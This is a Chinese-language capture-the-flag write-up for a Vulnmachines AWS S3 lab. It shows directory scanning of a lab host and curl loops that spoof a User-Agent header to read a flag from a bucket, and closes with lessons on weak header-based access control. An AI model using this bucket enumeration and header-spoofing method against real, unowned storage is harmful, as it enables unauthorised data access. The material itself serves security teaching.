09 Sep 2025 5 min read vulnmachines

Vulnmachines - Special Policy Bucket writeup (zh-TW)

題目資訊

平台: Vulnmachines
分類: Cloud Labs / AWS S3
描述: "Special Policy Bucket - AWS S3 Bucket with Special Access Policy"
題目連結: https://account.vulnmachines.com/user/challenges

解題過程

Step 1: 初步偵察

訪問題目網址，發現這次不是直接的 S3 URL，而是一個 EC2 實例：

# DNS 反查確認是 AWS EC2
nslookup 54.84.44.100
# 結果：ec2-54-84-44-100.compute-1.amazonaws.com

關鍵差異：

不像上一題直接給 S3 bucket URL
需要先找到 bucket 名稱和訪問方法
EC2 可能作為代理或託管應用

Step 2: 目錄掃描與探索

測試常見路徑：

# 檢查目錄列表
curl http://54.84.44.100/assets/
# 結果：開放目錄列表，但只是網站資源

# 測試 S3 相關路徑
curl http://54.84.44.100/policy.json  # 404
curl http://54.84.44.100/bucket       # 404
curl http://54.84.44.100/s3          # 404

使用目錄掃描工具：

gobuster dir -u http://54.84.44.100/ \
  -w /usr/share/wordlists/dirb/common.txt \
  -x html,json,txt

Step 3: 發現隱藏頁面

在測試過程中發現關鍵檔案：

curl http://54.84.44.100/secret.html

secret.html 內容揭露重要資訊：

多個 S3 bucket URLs

關鍵提示：

The user agent acts as a mediator between the user and the web server...
To access the bucket you required special User-agent VnMSecurityLab

發現的 bucket 列表：

vnm-sec-testa1cd
vnm-sec-testk2wka
vnm-sec-test24wka
vnm-sec-test124wka
vnm-sec-testk412ka
vnm-sec-testk4wka (真正的 bucket)
vnm-sec-testk235wka
vnm-sec-testk4w656a
vnm-sec-testk4wka435
vnm-sec-testk4w423ka

Step 4: 理解 Special Policy

題目名稱 "Special Policy Bucket" 的含義：

Bucket 配置了條件式訪問政策
只允許特定 User-Agent: VnMSecurityLab
這是 AWS S3 Bucket Policy 的常見安全配置

Step 5: 正確的訪問方法

使用自定義 User-Agent 批量測試所有 bucket：

for bucket in vnm-sec-testa1cd vnm-sec-testk2wka vnm-sec-test24wka \
              vnm-sec-test124wka vnm-sec-testk412ka vnm-sec-testk4wka \
              vnm-sec-testk235wka vnm-sec-testk4w656a vnm-sec-testk4wka435 \
              vnm-sec-testk4w423ka; do 
    echo "Testing: $bucket"
    curl -H "User-Agent: VnMSecurityLab" \
         "https://$bucket.s3.amazonaws.com/f149.txt" 2>/dev/null
    echo ""
done

結果分析：

9 個 bucket 返回 NoSuchBucket（假的）
1 個 bucket (vnm-sec-testk4wka) 返回內容

Testing: vnm-sec-testa1cd
<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>vnm-sec-testa1cd</BucketName><RequestId>WHF9REDPPQF46QN6</RequestId><HostId>XkJH7QyrtrRPIYvm0vp9JfQxSQ0Fxj9eIGHJHfDODYWX98EEcDPJte36WG5FJsg/L2Mpruemnp7RKGyiXp3F5Cnf6BVo3hjMGZB9pypgGJk=</HostId></Error>
Testing: vnm-sec-testk2wka
<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>vnm-sec-testk2wka</BucketName><RequestId>WHFEAZ0C2TYBQH17</RequestId><HostId>VUNnnV4H1tKnQLjCK6NgJkjwpixNWIkwb93qP1MpBga/GRItCkjjPXKUiKJNItDmol86f12xx/w=</HostId></Error>
Testing: vnm-sec-test24wka
<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>vnm-sec-test24wka</BucketName><RequestId>RVN1E6J47A6MP4B3</RequestId><HostId>IorhgIi1PUIbHoSvFfD8OPe3LRZ3NPX4+RvNWtqtL+lNTo3H2fu8ERN7nVVcyRHAV9Tz2AdF+zXwPW2eSpxLF9dM/0gvkDialrayvrtjWzE=</HostId></Error>
Testing: vnm-sec-test124wka
<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>vnm-sec-test124wka</BucketName><RequestId>MJVH1J44HSEX1R1G</RequestId><HostId>9D8q5BePeZUviPYGAzewm5JYhO0c5GYnXvfoc0k4vW7HelfxexRG92j1kCmA0/cfz3F9SZJUVLg=</HostId></Error>
Testing: vnm-sec-testk412ka
<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>vnm-sec-testk412ka</BucketName><RequestId>MJVV3GNCAX9C9E89</RequestId><HostId>CEKXMSe30e53h193sK+BuD07X+mkTJfPBEuHxnHbTEXFV3FzyxuWfUB//yh5ONmGVETWGqXOMJZv80naLf21P+bL2PtUaK56</HostId></Error>
Testing: vnm-sec-testk4wka
vnm{已隱藏}
Testing: vnm-sec-testk235wka
<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>vnm-sec-testk235wka</BucketName><RequestId>7T553RYZY29HVJ8Z</RequestId><HostId>dyr23oTfVDFclLVAicv3R7vLd8B8++LbgDaAd1Y406RvMBjSz8lvhRGX/cpgktgV05Aklz4V6ZEbZ9TehI/7tZQMOoPKzGuA</HostId></Error>
Testing: vnm-sec-testk4w656a
<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>vnm-sec-testk4w656a</BucketName><RequestId>7T5DC75XE0GNHXAD</RequestId><HostId>AOQu2WyIkTbty+sTPc01xU9w+hFnmK40IKS53GHFyvnhHTOg4m3sQ9tHu7v6uPi6v9hHM7b+tv4=</HostId></Error>
Testing: vnm-sec-testk4wka435
<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>vnm-sec-testk4wka435</BucketName><RequestId>BTV02H3RGFPJ4NZP</RequestId><HostId>BCcM2WnUOFqNf42lnWuSe2UIOuLbidKnOnRqYEADOuRCRpWh4BZ17MP5hdMSCCkejWYoNGzKMMgUMeTJE3ueXj8Eoi62c4FJuNPgywHlGag=</HostId></Error>
Testing: vnm-sec-testk4w423ka
<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>vnm-sec-testk4w423ka</BucketName><RequestId>V4QG90V60YFENQAZ</RequestId><HostId>lOEDC6WYi1t5awG7glfJATyMJOoHok1LriaqdmV2jzSv4Jr+N3hUjHNMEBNa1Ifu5GCXEoc/ezc=</HostId></Error>

Step 7: 獲得 Flag

成功訪問真正的 bucket：

curl -H "User-Agent: VnMSecurityLab" \
     https://vnm-sec-testk4wka.s3.amazonaws.com/f149.txt

Flag: vnm{已隱藏}

學習重點

安全配置誤區

User-Agent 限制不是真正的安全措施
容易被繞過（如本題所示）
應該使用更強的認證機制（IAM、簽名 URL）

總結

這個 CTF 展示了依賴 HTTP headers 作為安全控制的危險性，User-Agent 可以利用，不應作為唯一的訪問控制機制，在實際環境中，應該結合多層防禦。

題目資訊

解題過程

Step 1: 初步偵察

Step 2: 目錄掃描與探索

Step 3: 發現隱藏頁面

Step 4: 理解 Special Policy

Step 5: 正確的訪問方法

Step 7: 獲得 Flag

學習重點

安全配置誤區

總結

You might also like...

Bugku CTF - 本地管理員 writeup (zh-TW)

Bugku CTF - 變量1 writeup (zh-TW)

Bugku CTF - 備份是個好習慣 writeup (zh-TW)

Bugku CTF - source writeup (zh-TW)

TryHackMe Vulnerability Capstone writeup (zh-TW)